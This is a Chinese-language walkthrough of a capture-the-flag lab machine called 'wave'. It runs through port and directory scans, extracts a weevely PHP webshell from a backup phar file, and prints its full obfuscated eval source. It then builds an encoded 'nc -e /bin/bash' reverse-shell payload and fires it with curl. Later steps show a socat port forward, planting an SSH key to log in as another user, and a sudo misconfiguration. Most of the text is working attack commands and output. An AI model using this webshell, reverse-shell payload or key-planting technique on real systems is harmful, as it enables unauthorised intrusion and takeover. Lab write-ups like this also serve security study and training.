rustscan -a 192.168.0.104 -- -A\n\nOpen 192.168.0.104:22\nOpen 192.168.0.104:80\nPORT STATE SERVICE REASON VERSION\n22\/tcp open ssh syn-ack OpenSSH 9.2p1 Debian 2 (protocol 2.0)\n| ssh-hostkey: \n| 256 07:e9:c8:22:59:a5:00:41:15:fa:26:0f:7d:d3:29:ff (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKe0UpYSdrYZSfz8wEnzmtB6rYS+QxwxRUwAGzpy57vqkqNrVAHXyNTbkqD8a+OQMTBeCqlLnlhIFtw74VaGP7Y=\n| 256 c7:81:8e:06:49:33:8f:1a:88:3b:82:9e:27:f3:72:1e (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIF6i9HqL7v6nqbyYKQLfWZoPI7oyUyoBwBNhumUpRpWJ\n80\/tcp open http syn-ack nginx 1.22.1\n|_http-title: Site doesn't have a title (text\/html).\n| http-robots.txt: 1 disallowed entry \n|_\/backup\n| http-methods: \n|_ Supported Methods: GET HEAD\n|_http-server-header: nginx\/1.22.1\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/wave]\n\u2514\u2500$ gobuster dir -u http:\/\/192.168.0.104\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,git,jpg,txt,png\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url: http:\/\/192.168.0.104\/\n[+] Method: GET\n[+] Threads: 10\n[+] Wordlist: \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes: 404\n[+] User Agent: gobuster\/3.6\n[+] Extensions: zip,git,jpg,txt,png,php\n[+] Timeout: 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/backup (Status: 301) [Size: 169] [--> http:\/\/192.168.0.104\/backup\/]\n\/robots.txt (Status: 200) [Size: 18]\n\/phptest.php (Status: 200) [Size: 11]\nProgress: 1543920 \/ 1543927 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n\u6f0f\u6d1e\u626b\u63cf<\/h3>\n- Nikto v2.5.0\n---------------------------------------------------------------------------\n+ Target IP: 192.168.0.104\n+ Target Hostname: 192.168.0.104\n+ Target Port: 80\n+ Start Time: 2024-04-19 01:04:19 (GMT-4)\n---------------------------------------------------------------------------\n+ Server: nginx\/1.22.1\n+ \/: The anti-clickjacking X-Frame-Options header is not present. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Headers\/X-Frame-Options\n+ \/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https:\/\/www.netsparker.com\/web-vulnerability-scanner\/vulnerabilities\/missing-content-type-header\/\n+ No CGI Directories found (use '-C all' to force check all possible dirs)\n+ \/backup\/: Directory indexing found.\n+ \/robots.txt: Entry '\/backup\/' is returned a non-forbidden or redirect HTTP code (200). See: https:\/\/portswigger.net\/kb\/issues\/00600600_robots-txt-file+ \/robots.txt: contains 1 entry which should be manually viewed. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Glossary\/Robots.txt\n+ \/backup\/: This might be interesting.\n+ \/#wp-config.php#: #wp-config.php# file found. This file contains the credentials.\n+ 8103 requests: 0 error(s) and 7 item(s) reported on remote host\n+ End Time: 2024-04-19 01:04:32 (GMT-4) (13 seconds)\n---------------------------------------------------------------------------\n+ 1 host(s) tested<\/code><\/pre>\n\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n\u8e29\u70b9<\/h3>\n<h1> WAVE <\/h1>\n\n<!-- wAvE --><\/code><\/pre>\n<\/div><\/p>\n\u654f\u611f\u76ee\u5f55<\/h3>\nhttp:\/\/192.168.0.104\/robots.txt<\/code><\/pre>\nDisallow: \/backup<\/code><\/pre>\nhttp:\/\/192.168.0.104\/backup\/<\/code><\/pre>\n<\/div><\/p>\n\u4e0b\u8f7d\u4e0b\u6765\u770b\u770b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/wave]\n\u2514\u2500$ ls -la\ntotal 28\ndrwxr-xr-x 2 kali kali 4096 Apr 19 01:08 .\ndrwxr-xr-x 52 kali kali 4096 Apr 19 01:02 ..\n-rw-r--r-- 1 kali kali 31 Sep 4 2023 index.bck\n-rw-r--r-- 1 kali kali 4 Sep 4 2023 log.log\n-rw-r--r-- 1 kali kali 32 Sep 4 2023 phptest.bck\n-rw-r--r-- 1 kali kali 18 Sep 4 2023 robots.bck\n-rw-r--r-- 1 kali kali 515 Sep 5 2023 weevely.bck\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/wave]\n\u2514\u2500$ cat index.bck \n<h1> WAVE <\/h1>\n\n<!-- wAvE -->\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/wave]\n\u2514\u2500$ cat log.log \nOK\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/wave]\n\u2514\u2500$ cat phptest.bck \n<?php\nprint ("HELLO WORLD");\n?>\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/wave]\n\u2514\u2500$ cat robots.bck \nDisallow: \/backup\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/wave]\n\u2514\u2500$ cat weevely.bck \n<?php include "\\160\\x68\\141\\x72\\72\\57\\57".basename(__FILE__)."\\57\\x78";__HALT_COMPILER(); ?>\/x\ufffdX\ufffd\ufffd\u0317\ufffdU\ufffd\ufffdj\ufffd0\u017f\ufffd)J\ufffdhB\ufffdS;\ufffd\ufffd\ufffd\n \ufffd\/\ufffdJ\ufffd\ufffdm\ufffd.\ufffd\ufffd)\ufffd\ufffdn@\ufffd\ufffd.\ufffd\\\ufffd]=6\ufffd&T\ufffdYE\ufffdp\ufffd\ufffd(\ufffd\ufffd"`\ufffda'H\ufffdPq6\ufffd.\ufffdv\ufffd\ufffd\ufffd\/\ufffd8\ufffd\u0133e\ufffd\ufffd$+\ufffd\ufffds\ufffd"\ufffd\ufffd\ufffd\ufffd5\ufffd|\ufffd\ufffdH\ufffd\ufffd O\ufffd\ufffd\ufffd\ufffdw\ufffd2%\ufffd\ufffdOyTV\ufffd\ufffd\ufffdQ\ufffdb\ufffdA\ufffd\ufffd\ufffdh\ufffd\ufffd=\ufffdW {\ufffd\ufffd\n\ufffdk\u041bw8\ufffda\ufffd\ufffd\ufffd\ufffdS\ufffd\ufffd\ufffd\ufffd\ufffd\n\ufffdfBLXx \ufffd\ufffd\ufffd\u03dc\ufffd\ufffd\ufffd\ufffdv\ufffd\ufffd\ufffd\ufffdm\ufffd\ufffd\ufffd%#,H\ufffd\ufffdR#2HJ]\ufffdt\ufffd|*\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffdh\ufffdMs\ufffd\n \u0696&'\ufffd\ufffdY\ufffd\ufffd\ufffdP\ufffd\ufffdB\ufffd\ufffdlXw\ufffdl\ufffde\ufffd\ufffd\ufffdE!S\ufffdHe\ufffd2\ufffdp\ufffd7G\ufffd[N\ufffd\ufffd=\ufffd-\ufffd\ufffd\u0243\ufffdi\ufffd)\ufffd[\ufffd\ufffdN\ufffd\ufffd\ufffd7\ufffd\ufffdU_\ufffd=*\ufffd\ufffd\u03a8\ufffds?c((VGBMB<\/code><\/pre>\n\u770b\u6765\u91cd\u70b9\u5728\u4e8eweevely.bck<\/code>\uff0c\u770b\u4e00\u4e0b\u8fd9\u662f\u5565\uff1a<\/p>\n\n\u5e26\u6709SHA1\u7b7e\u540d\u7684PHP Phar\u5f52\u6863\u6587\u4ef6\u662f\u4e00\u79cd\u4e13\u4e3a\u6253\u5305\u548c\u5206\u53d1PHP\u5e94\u7528\u7a0b\u5e8f\u6216\u5e93\u800c\u8bbe\u8ba1\u7684\u538b\u7f29\u6587\u4ef6\u683c\u5f0f\u3002"Phar"\u662f"PHP Archive"\u7684\u7f29\u5199\uff0c\u76f8\u5f53\u4e8eJava\u4e2d\u7684JAR\u6587\u4ef6\u6216ZIP\u5f52\u6863\u6587\u4ef6\u5728PHP\u751f\u6001\u7cfb\u7edf\u4e2d\u7684\u89d2\u8272\u3002<\/p>\n<\/blockquote>\n
\u8fd8\u6709\u4e00\u4e2a\u76ee\u5f55\uff1a<\/p>\n
http:\/\/192.168.0.104\/phptest.php<\/code><\/pre>\nHELLO WORLD<\/code><\/pre>\n\u8054\u60f3\u5230\u8fd9\u51e0\u4e2a\u5173\u7cfb\uff1a<\/p>\n
phptest.php --> phptest.bck\nrobots.bck --> robots.bck\nindex.php --> index.bck\n? --> log.log\n? --> weevely.bck<\/code><\/pre>\n\u5c1d\u8bd5fuzz\u4e00\u4e0b\uff1a<\/p>\n
php\nphp7\nphp5\nphp4\nphp3\nphp2\nphp1\nhtml\nhtm\nphtml\npht\nPhp\npHp\nphP\nPHP<\/code><\/pre>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/wave]\n\u2514\u2500$ ffuf -w file:FILE -w dotphp:EXT -u http:\/\/192.168.0.104\/FILE.EXT \n\n \/'___\\ \/'___\\ \/'___\\ \n \/\\ \\__\/ \/\\ \\__\/ __ __ \/\\ \\__\/ \n \\ \\ ,__\\\\ \\ ,__\\\/\\ \\\/\\ \\ \\ \\ ,__\\ \n \\ \\ \\_\/ \\ \\ \\_\/\\ \\ \\_\\ \\ \\ \\ \\_\/ \n \\ \\_\\ \\ \\_\\ \\ \\____\/ \\ \\_\\ \n \\\/_\/ \\\/_\/ \\\/___\/ \\\/_\/ \n\n v2.1.0-dev\n________________________________________________\n\n :: Method : GET\n :: URL : http:\/\/192.168.0.104\/FILE.EXT\n :: Wordlist : FILE: \/home\/kali\/temp\/wave\/file\n :: Wordlist : EXT: \/home\/kali\/temp\/wave\/dotphp\n :: Follow redirects : false\n :: Calibration : false\n :: Timeout : 10\n :: Threads : 40\n :: Matcher : Response status: 200-299,301,302,307,401,403,405,500\n________________________________________________\n\n[Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 18ms]\n * EXT: php7\n * FILE: weevely\n\n:: Progress: [30\/30] :: Job [1\/1] :: 0 req\/sec :: Duration: [0:00:00] :: Errors: 0 ::<\/code><\/pre>\n\u62ff\u4e0b\uff01weevely.php7<\/code>\uff0c\u5c1d\u8bd5\u63d0\u53d6\u4e00\u4e0b\uff1a<\/p>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/wave]\n\u2514\u2500$ vim extract.php\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/wave]\n\u2514\u2500$ php extract.php\nPHP Fatal error: Uncaught UnexpectedValueException: Cannot create phar 'weevely.bck', file extension (or combination) not recognised or the directory does not exist in \/home\/kali\/temp\/wave\/extract.php:2\nStack trace:\n#0 \/home\/kali\/temp\/wave\/extract.php(2): Phar->__construct()\n#1 {main}\n thrown in \/home\/kali\/temp\/wave\/extract.php on line 2\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/wave]\n\u2514\u2500$ mv weevely.bck weevely.phar \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/wave]\n\u2514\u2500$ vim extract.php \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/wave]\n\u2514\u2500$ php extract.php \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/wave]\n\u2514\u2500$ ls -la\ntotal 44\ndrwxr-xr-x 3 kali kali 4096 Apr 19 01:30 .\ndrwxr-xr-x 52 kali kali 4096 Apr 19 01:02 ..\n-rw-r--r-- 1 kali kali 69 Apr 19 01:17 dotphp\n-rw-r--r-- 1 kali kali 76 Apr 19 01:30 extract.php\n-rw-r--r-- 1 kali kali 12 Apr 19 01:17 file\n-rw-r--r-- 1 kali kali 31 Sep 4 2023 index.bck\n-rw-r--r-- 1 kali kali 4 Sep 4 2023 log.log\n-rw-r--r-- 1 kali kali 32 Sep 4 2023 phptest.bck\n-rw-r--r-- 1 kali kali 18 Sep 4 2023 robots.bck\n-rwxr-xr-x 1 kali kali 515 Sep 5 2023 weevely.phar\ndrwxr-xr-x 2 kali kali 4096 Apr 19 01:30 weevely.php7\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/wave]\n\u2514\u2500$ cat extract.php \n<?php\n$phar = new Phar("weevely.phar"); \n$phar->extractTo("weevely.php7");<\/code><\/pre>\n\u63d2\u5361\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/wave]\n\u2514\u2500$ cd weevely.php7 \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/wave\/weevely.php7]\n\u2514\u2500$ ls -la\ntotal 12\ndrwxr-xr-x 2 kali kali 4096 Apr 19 01:30 .\ndrwxr-xr-x 3 kali kali 4096 Apr 19 01:30 ..\n-rwxrwxrwx 1 kali kali 481 Apr 19 01:30 x\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/wave\/weevely.php7]\n\u2514\u2500$ cat x \n<?php eval('$k="3ddf0d5c";$kh="b6e7a529b6c2";$kf="d598a771749b";$p="afnqDsRcBpVmU71y";\n\nfunction x($t,$k){\n$c=strlen($k);$l=strlen($t);$o="";\nfor($i=0;$i<$l;){\nfor($j=0;($j<$c&&$i<$l);$j++,$i++)\n{\n$o.=$t[$i]^$k[$j];\n}\n}\nreturn $o;\n}\nif (@preg_match("\/$kh(.+)$kf\/",@file_get_contents("php:\/\/input"),$m)==1) {\n@ob_start();\n@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));\n$o=@ob_get_contents();\n@ob_end_clean();\n$r=@base64_encode(@x(@gzcompress($o),$k));\nprint("$p$kh$r$kf");\n}');<\/code><\/pre>\n<?php\n\n$k = "3ddf0d5c";\n$kh = "b6e7a529b6c2";\n$kf = "d598a771749b";\n$p = "afnqDsRcBpVmU71y";\n\nfunction x($t, $k)\n{\n $c = strlen($k);\n $l = strlen($t);\n $o = "";\n\n for ($i = 0; $i < $l; )\n {\n for ($j = 0; ($j < $c && $i < $l); $j++, $i++)\n {\n $o .= $t[$i] ^ $k[$j];\n }\n }\n\n return $o;\n}\n\nif (@preg_match("\/$kh(.+)$kf\/", @file_get_contents("php:\/\/input"), $m) == 1)\n{\n @ob_start();\n\n @eval(@gzuncompress(@x(@base64_decode($m[1]), $k)));\n\n $o = @ob_get_contents();\n @ob_end_clean();\n\n $r = @base64_encode(@x(@gzcompress($o), $k));\n\n print("$p$kh$r$kf");\n}<\/code><\/pre>\n\u8fdb\u884c\u4e86\u4e09\u4e2a\u64cd\u4f5c\uff0c\u538b\u7f29<\/code>\uff0cXOR<\/code>\u4ee5\u53cabase64<\/code>\u7f16\u7801\uff0c\u5c1d\u8bd5\u8fdb\u884c\u5229\u7528\uff1a<\/p>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/wave\/weevely.php7]\n\u2514\u2500$ curl -X POST 192.168.0.104\/weevely.php7 -d "b6e7a529b6c2 \u547d\u4ee4 d598a771749b"\nafnqDsRcBpVmU71yb6e7a529b6c2S\/hnZjBkNWI=d598a771749b<\/code><\/pre>\n\u5c1d\u8bd5\u521b\u5efa\u4e00\u4e2a\u903b\u8f91\u76f8\u53cd\u7684\u811a\u672c\uff0c\u4f7f\u5176\u53ef\u4ee5\u4f20\u5165\u6211\u4eec\u7684\u547d\u4ee4\uff1a<\/p>\n
<?php\n$k = "3ddf0d5c";\nfunction x($t, $k)\n{\n $c = strlen($k);\n $l = strlen($t);\n $o = "";\n\n for ($i = 0; $i < $l; )\n {\n for ($j = 0; ($j < $c && $i < $l); $j++, $i++)\n {\n $o .= $t[$i] ^ $k[$j];\n }\n }\n\n return $o;\n}\nprint(@base64_encode(@x(@gzcompress('system("nc -e \/bin\/bash 192.168.0.143 1234");'),$k)));<\/code><\/pre>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/wave\/weevely.php7]\n\u2514\u2500$ php decrypt.php\nS\/hPyBxKfK7mNK4tZrR4NuMrrqrjK39P\/TRU0gS2BleAtFe2A1AENQNQVlBhtoFlM15FbdU=<\/code><\/pre>\n\u63d2\u5165\u8fdb\u53bb\uff0c\u7136\u540e\u76d1\u542c\u6267\u884c\u547d\u4ee4\uff1a<\/p>\n
curl -X POST 192.168.0.104\/weevely.php7 -d "b6e7a529b6c2S\/hPyBxKfK7mNK4tZrR4NuMrrqrjK39P\/TRU0gS2BleAtFe2A1AENQNQVlBhtoFlM15FbdU=d598a771749b"<\/code><\/pre>\n<\/div><\/p>\n\u62ff\u5230shell\u4e86\uff01<\/p>\n
\u63d0\u6743<\/h2>\n\u4fe1\u606f\u641c\u96c6<\/h3>\n(remote) www-data@wave:\/var\/www\/html$ whoami;id\nwww-data\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n(remote) www-data@wave:\/var\/www\/html$ sudo -l\n[sudo] password for www-data: \nsudo: a password is required\n(remote) www-data@wave:\/var\/www\/html$ ls -la\ntotal 32\ndrwxr-xr-x 3 www-data www-data 4096 Sep 5 2023 .\ndrwxr-xr-x 3 root root 4096 Sep 4 2023 ..\ndrwxr-xr-x 2 www-data www-data 4096 Sep 5 2023 backup\n-rw-r--r-- 1 www-data www-data 31 Sep 4 2023 index.html\n-rw-r--r-- 1 www-data www-data 32 Sep 4 2023 phptest.php\n-rw-r--r-- 1 www-data www-data 18 Sep 4 2023 robots.txt\n-rw-r--r-- 1 root root 515 Sep 5 2023 weevely.bck\n-rw-r--r-- 1 www-data www-data 515 Sep 5 2023 weevely.php7\n(remote) www-data@wave:\/var\/www\/html$ cd ..\/..\/ \n(remote) www-data@wave:\/var$ ls -la\ntotal 48\ndrwxr-xr-x 12 root root 4096 Sep 4 2023 .\ndrwxr-xr-x 18 root root 4096 Sep 4 2023 ..\ndrwxr-xr-x 2 root root 4096 Apr 19 07:20 backups\ndrwxr-xr-x 10 root root 4096 Sep 4 2023 cache\ndrwxr-xr-x 24 root root 4096 Sep 4 2023 lib\ndrwxrwsr-x 2 root staff 4096 Mar 2 2023 local\nlrwxrwxrwx 1 root root 9 Sep 4 2023 lock -> \/run\/lock\ndrwxr-xr-x 8 root root 4096 Apr 19 07:00 log\ndrwxrwsr-x 2 root mail 4096 Sep 4 2023 mail\ndrwxr-xr-x 2 root root 4096 Sep 4 2023 opt\nlrwxrwxrwx 1 root root 4 Sep 4 2023 run -> \/run\ndrwxr-xr-x 3 root root 4096 Sep 4 2023 spool\ndrwxrwxrwt 4 root root 4096 Apr 19 07:39 tmp\ndrwxr-xr-x 3 root root 4096 Sep 4 2023 www\n(remote) www-data@wave:\/var$ mail\nbash: mail: command not found\n(remote) www-data@wave:\/var$ cd mail\n(remote) www-data@wave:\/var\/mail$ ls -la\ntotal 8\ndrwxrwsr-x 2 root mail 4096 Sep 4 2023 .\ndrwxr-xr-x 12 root root 4096 Sep 4 2023 ..\n(remote) www-data@wave:\/var\/mail$ cd ..\/\n(remote) www-data@wave:\/var$ cd backups\/\n(remote) www-data@wave:\/var\/backups$ ls -la\ntotal 16\ndrwxr-xr-x 2 root root 4096 Apr 19 07:20 .\ndrwxr-xr-x 12 root root 4096 Sep 4 2023 ..\n-rw-r--r-- 1 root root 8019 Sep 4 2023 apt.extended_states.0\n(remote) www-data@wave:\/var\/backups$ cd \/home\n(remote) www-data@wave:\/home$ ls -la\ntotal 16\ndrwxr-xr-x 4 root root 4096 Sep 4 2023 .\ndrwxr-xr-x 18 root root 4096 Sep 4 2023 ..\ndrwx------ 3 angie angie 4096 Sep 5 2023 angie\ndrwx------ 2 carla carla 4096 Sep 4 2023 carla\n(remote) www-data@wave:\/home$ cd angie\/\nbash: cd: angie\/: Permission denied\n(remote) www-data@wave:\/home$ cd carla\/\nbash: cd: carla\/: Permission denied\n(remote) www-data@wave:\/home$ ss -tulnp\nNetid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process\nudp UNCONN 0 0 0.0.0.0:68 0.0.0.0:*\ntcp LISTEN 0 1024 127.0.0.1:3923 0.0.0.0:*\ntcp LISTEN 0 511 0.0.0.0:80 0.0.0.0:* users:\ntcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*\ntcp LISTEN 0 511 [::]:80 [::]:* users: \ntcp LISTEN 0 128 [::]:22 [::]:*<\/code><\/pre>\n\u7aef\u53e3\u8f6c\u53d1<\/h3>\n(remote) www-data@wave:\/home$ cd \/tmp\n(remote) www-data@wave:\/tmp$ \n(local) pwncat$ lpwd\n\/home\/kali\/temp\/wave\n(local) pwncat$ lcd ..\n(local) pwncat$ upload socat\n.\/socat \u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501 100.0% \u2022 375.2\/375.2 KB \u2022 ? \u2022 0:00:00[01:56:23] uploaded 375.18KiB in 0.52 seconds upload.py:76\n(local) pwncat$ \n(remote) www-data@wave:\/tmp$ chmod +x socat\n(remote) www-data@wave:\/tmp$ .\/socat TCP-LISTEN:8888,reuseaddr,fork TCP:127.0.0.1:3923<\/code><\/pre>\n\u5c1d\u8bd5\u8fdb\u884c\u8bbf\u95ee\uff1a<\/p>\n
<\/div><\/p>\n\u7136\u540e\u770b\u5230\u4e86flag\uff1a<\/p>\n
http:\/\/192.168.0.104:8888\/user.txt<\/code><\/pre>\nHMVIdsEwudDxJDSaue32DJa<\/code><\/pre>\n\u4e0a\u4f20\u516c\u94a5\u767b\u5f55angie<\/h3>\n
\u731c\u6d4b\u8fd9\u662f\u67d0\u4e2a\u7528\u6237\u7684\u76ee\u5f55\uff0c\u5c1d\u8bd5\u4e0a\u4f20\u516c\u94a5\uff1a<\/p>\n
<\/div><\/p>\n\u73b0\u5728\u672c\u5730\u751f\u6210\u4e00\u4e2a\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/wave]\n\u2514\u2500$ mkdir .ssh \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/wave]\n\u2514\u2500$ cd .ssh\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/wave\/.ssh]\n\u2514\u2500$ ssh-keygen -t rsa \nGenerating public\/private rsa key pair.\nEnter file in which to save the key (\/home\/kali\/.ssh\/id_rsa): wave\nEnter passphrase (empty for no passphrase): \nEnter same passphrase again: \nYour identification has been saved in wave\nYour public key has been saved in wave.pub\nThe key fingerprint is:\nSHA256:Z54ECWnXNfv0Xn8J1Mg5X6mSNGexML65DCqBI89RlOQ kali@kali\nThe key's randomart image is:\n+---[RSA 3072]----+\n| .oo. . +o. |\n| o.o...o +o* .|\n| E .o +.X.o.|\n| o .. Oo+..|\n| . + . S.+= o..o|\n| + o . .=o.o ..+|\n| o . . oo .+|\n| . .|\n| |\n+----[SHA256]-----+\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/wave\/.ssh]\n\u2514\u2500$ ls -la\ntotal 16\ndrwxr-xr-x 2 kali kali 4096 Apr 19 02:03 .\ndrwxr-xr-x 4 kali kali 4096 Apr 19 02:02 ..\n-rw------- 1 kali kali 2590 Apr 19 02:03 wave\n-rw-r--r-- 1 kali kali 563 Apr 19 02:03 wave.pub\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/wave\/.ssh]\n\u2514\u2500$ cat wave.pub \nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCdqHIaORaxfuxWiWq68JQH1InqIKbA5R83FJ3lU2KiZK+jV1DvSepdzgCbpZuau3PIryo1xKO+ATOauAX6Z5E1TPFDqrnhBhFUTBa5RA0WoHEJl7TuPt3DINGRjlwOcrwunsFjdyVvTDQfI+Wgyto9jXAPKUVgC\/voy+8JNbmNAZ3tKpeYtjIMgl7K+EzabnYaPswMupGfSMzH15NzL7O5enVkhkZmdB3YgqQZOZSk9tYy\/WlM50j4Wt6Yjjcz\/rMSKZPuagcZn68lqR8mDVr1uB76xQCEmWyluKVAAUOhZaKKKEJdgDkHzHQg99jhUUOw8HDE8UKEXTMbEx5Hgmk8xB3ORqU2pq9R9mh\/t2B0X2KyyEjy\/Tnlg7XWAVoGyv9t8kritilZQC3hF0a8tBrBKB93\/2FNB83FK9Ghk+OfsiEpxIdIW5kd76QmR6OUZ7nK0Ku0dtNjSjmoP7Hs\/FbDuNcaNfWTXUD8V1pnwMno\/TFBXgohckGng5GJ1sF\/0ok= kali@kali<\/code><\/pre>\n\u6539\u4e2a\u540d\u4e0a\u4f20\uff1a<\/p>\n
<\/div>
\n<\/div><\/p>\n\u5c1d\u8bd5\u8fdb\u884c\u767b\u5f55\uff0c\u4f46\u662f\u5931\u8d25\u4e86\uff0c\u53ef\u80fd\u662f\u7c98\u8d34\u5230windows\u51fa\u73b0\u4e86\u4e00\u4e9b\u95ee\u9898\uff0c\u5c1d\u8bd5\u5728linux\u4e0b\u8fdb\u884c\u5c1d\u8bd5\uff0c\u5148\u91cd\u542f\u4e00\u4e0b\u9776\u673a\uff1a<\/p>\n
<\/div><\/p>\n\u574f\u4e8b\u4e86\uff0c\u91cd\u65b0\u8f7d\u5165\u9776\u673a\u3002\u3002\u3002\u3002<\/p>\n
<\/div><\/p>\n\u76f4\u63a5\u4f20linux\u7684\u6587\u4ef6\u8fc7\u53bb\uff1a<\/p>\n
<\/div><\/p>\n\u518d\u8bd5\u4e00\u6b21\uff1a<\/p>\n
<\/div><\/p>\n\u6210\u529f\uff01<\/p>\n
\u4fe1\u606f\u641c\u96c6<\/h3>\nangie@wave:~$ ls -la\ntotal 680\ndrwx------ 5 angie angie 4096 abr 19 10:59 .\ndrwxr-xr-x 4 root root 4096 sep 4 2023 ..\nlrwxrwxrwx 1 angie angie 9 sep 4 2023 .bash_history -> \/dev\/null\n-rw-r--r-- 1 angie angie 220 sep 4 2023 .bash_logout\n-rw-r--r-- 1 angie angie 3526 sep 4 2023 .bashrc\n-rw-r--r-- 1 angie angie 646042 sep 2 2023 copyparty-sfx.py\ndrwxr-xr-x 2 angie angie 4096 abr 19 10:59 .hist\ndrwxr-xr-x 3 angie angie 4096 sep 4 2023 .local\n-rw-r--r-- 1 angie angie 807 sep 4 2023 .profile\n-rw-r--r-- 1 angie angie 66 sep 4 2023 .selected_editor\ndrwxr-xr-x 2 angie angie 4096 abr 19 10:58 .ssh\n-rw------- 1 angie angie 24 sep 4 2023 user.txt\n-rw-r--r-- 1 angie angie 165 sep 4 2023 .wget-hsts\n-rw------- 1 angie angie 50 sep 5 2023 .Xauthority\nangie@wave:~$ cat user.txt\nHMVIdsEwudDxJDSaue32DJa\nangie@wave:~$ sudo -l\nMatching Defaults entries for angie on wave:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin, use_pty\n\nUser angie may run the following commands on wave:\n (ALL) NOPASSWD: \/usr\/bin\/less -F \/opt\/secret.txt\nangie@wave:~$ sudo \/usr\/bin\/less -F \/opt\/secret.txt\nDietro di lui, \ndietro di lui solo la nebbia.<\/code><\/pre>\n
![\"image-20240419130532476\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404191709996.png\")
<\/div><\/p>\n![\"image-20240419130645410\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404191709997.png\")
<\/div><\/p>\n![\"image-20240419135436982\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404191709998.png\")
<\/div><\/p>\n![\"image-20240419135941061\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404191709999.png\")
<\/div><\/p>\n![\"image-20240419140226317\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404191709000.png\")
<\/div><\/p>\n![\"image-20240419140550328\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404191709001.png\")
<\/div>![\"image-20240419140604254\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404191709002.png\")
<\/div><\/p>\n![\"image-20240419165113430\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404191709003.png\")
<\/div><\/p>\n![\"image-20240419165620267\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404191709004.png\")
<\/div><\/p>\n![\"image-20240419165818256\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404191709005.png\")
